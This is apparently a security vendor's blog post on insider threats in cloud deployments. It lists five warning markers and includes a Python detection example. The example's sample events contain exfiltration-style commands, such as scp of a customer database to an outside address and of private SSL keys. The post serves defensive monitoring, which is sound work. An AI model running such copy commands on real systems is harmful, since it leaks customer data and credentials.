“The Call is Coming from Inside the House”: Insider Threats Pose Major Security Concerns for Enterprise

Security is a major concern and potential roadblock for companies starting up in the cloud or considering a move into the cloud. Incidents such as the recent high-profile attack on the “online cheating site” Ashley Madison do little to assuage those fears, as companies must consider how best to protect themselves from both external and insider threats.

Amazon provides a basic tool set for protecting the perimeter with security groups and VPCs, but that is just one piece in a comprehensive strategy to protect against external threats. The bigger challenge, as enterprise customers can testify, is protecting against insider threats. The “threat” here is not just malicious intent of the insiders themselves, but the system misconfigurations that are the entry points external actors utilize to get inside the perimeter.

Brian Krebs from KrebsonSecurity.com sought comment from Avid Life Media (parent organization for Ashley Madison) Chief Executive Noel Biderman on the attack, who shared that the incident “…may have been the work of someone who at least at one time had legitimate, inside access to the company’s networks — perhaps a former employee or contractor.”

Who are these insiders? They may be disgruntled employees, or perhaps internal users who are unaware of how their actions leave the proverbial doors wide open. It may even be a partner.

The following are five markers of insider threats and the corresponding steps security teams can take to address them:

  1. Copying customer data and intellectual property from production environments
    An internal user who copies files from production environments into development environments or local workstations is a potential threat.

    Action: Monitor for commands such as SCP and wget. Additionally, monitor for access to critical customer files.

  2. Copying of internal configurations, passwords, certificates and keys
    While this is routinely done for easy access between machines in production, these actions may still result in passing the “keys to the kingdom” out of the locked-down ops environments.

    Action: Monitor for commands such as SCP and wget. Monitor for access to critical customer files.

  3. Users not logging in from jump hosts
    Any user who does not follow policy and logs in from hosts that are not jump hosts is potentially an insider threat.

    Action: Monitor for user logins from IPs that are not jump hosts.

  4. Packages updated by hand on live systems
    Package updates in prod environments should be done through configuration management systems such as Chef or Puppet. Package updates done by hand in prod cause major security loopholes because of misconfigured applications.

    Action: Monitor for commands like “apt-get install” or “yum install” run by users other than Chef.

  5. Edits of configuration files
    Manual edits to configuration files often produce configurations that are not in line with security policies, thus increasing the attack surface of prod environments.

    Action: Track changes to key configuration files.
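The five “Action” items above amount to a small rule set over per-process audit events (user, source IP, command line, files written). The following is an added example of that rule set applied to constructed events; it is not Threat Stack code, and the jump-host addresses, Chef account name and file paths are assumed values a deployment would supply from its own inventory.

```python
import shlex
from dataclasses import dataclass, field

JUMP_HOSTS = {"10.0.0.5", "10.0.0.6"}             # marker 3: assumed sanctioned login sources
CM_USERS = {"chef"}                                # marker 4: assumed config-management account
CUSTOMER_DATA = {"/srv/app/customers.db", "/srv/app/exports/"}    # marker 1 (assumed paths)
CREDENTIALS = {"/etc/ssl/private/", "/home/deploy/.ssh/"}         # marker 2 (assumed paths)
CONFIG_FILES = {"/etc/nginx/nginx.conf", "/etc/ssh/sshd_config"}  # marker 5 (assumed paths)

@dataclass
class Event:
    user: str
    src_ip: str                 # address the TTY session was opened from
    command: str                # command line recorded for the process
    files_written: list = field(default_factory=list)  # paths the process opened for write

def _mentions(text, patterns):
    # Coarse substring match so forms like "--post-file=/srv/app/customers.db" also trip.
    return any(p in text for p in patterns)

def check_event(ev):
    """Return the sorted list of marker numbers (1-5) this event trips."""
    hits = []
    argv = shlex.split(ev.command)
    if argv and argv[0] == "sudo":        # look through sudo to the real command
        argv = argv[1:]
    prog = argv[0].rsplit("/", 1)[-1] if argv else ""
    args = argv[1:]
    if ev.src_ip not in JUMP_HOSTS:                       # 3: login not via a jump host
        hits.append(3)
    if prog in {"scp", "wget", "rsync"}:                  # 1 and 2: data leaving prod
        if any(_mentions(a, CUSTOMER_DATA) for a in args):
            hits.append(1)
        if any(_mentions(a, CREDENTIALS) for a in args):
            hits.append(2)
    if prog in {"apt-get", "yum"} and "install" in args and ev.user not in CM_USERS:
        hits.append(4)                                    # 4: package install outside Chef
    if any(_mentions(p, CONFIG_FILES) for p in ev.files_written):
        hits.append(5)                                    # 5: manual config edit
    return sorted(hits)

# Constructed sample events: one per marker plus a sanctioned Chef run.
EVENTS = [
    Event("alice", "10.0.0.5", "scp /srv/app/customers.db alice@203.0.113.7:~/"),
    Event("bob", "192.168.1.20", "sudo apt-get install nginx"),
    Event("chef", "10.0.0.6", "apt-get install -y nginx"),
    Event("carol", "10.0.0.5", "vim /etc/nginx/nginx.conf", ["/etc/nginx/nginx.conf"]),
    Event("dave", "10.0.0.6", "scp -r /etc/ssl/private/ dave@10.0.0.9:/tmp/"),
]
```

Bob's event trips two markers at once (non-jump-host login plus a hand-run install), which is the kind of correlation a single-rule alert would miss.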

Any type of system breach is the worst nightmare of internal security teams and providers alike, but it’s more common than many would believe. In fact, at Threat Stack we have observed many instances of insider threats in our customers’ deployments, and we’ve caught them because of the quality of information our agent is able to collect. The agent gives us insight and visibility across the entire infrastructure of a customer’s system, including the actions of each user, such as TTY sessions, processes and their corresponding network behavior, and critical file tracking.

By working with security providers who specialize in continuous monitoring of cloud environments, such as Threat Stack, enterprises vastly improve their chances of avoiding external and internal threats. For those who aren’t yet taking this precaution, the Ashley Madison incident may prove beneficial in demonstrating what can happen when you leave your cloud data at risk.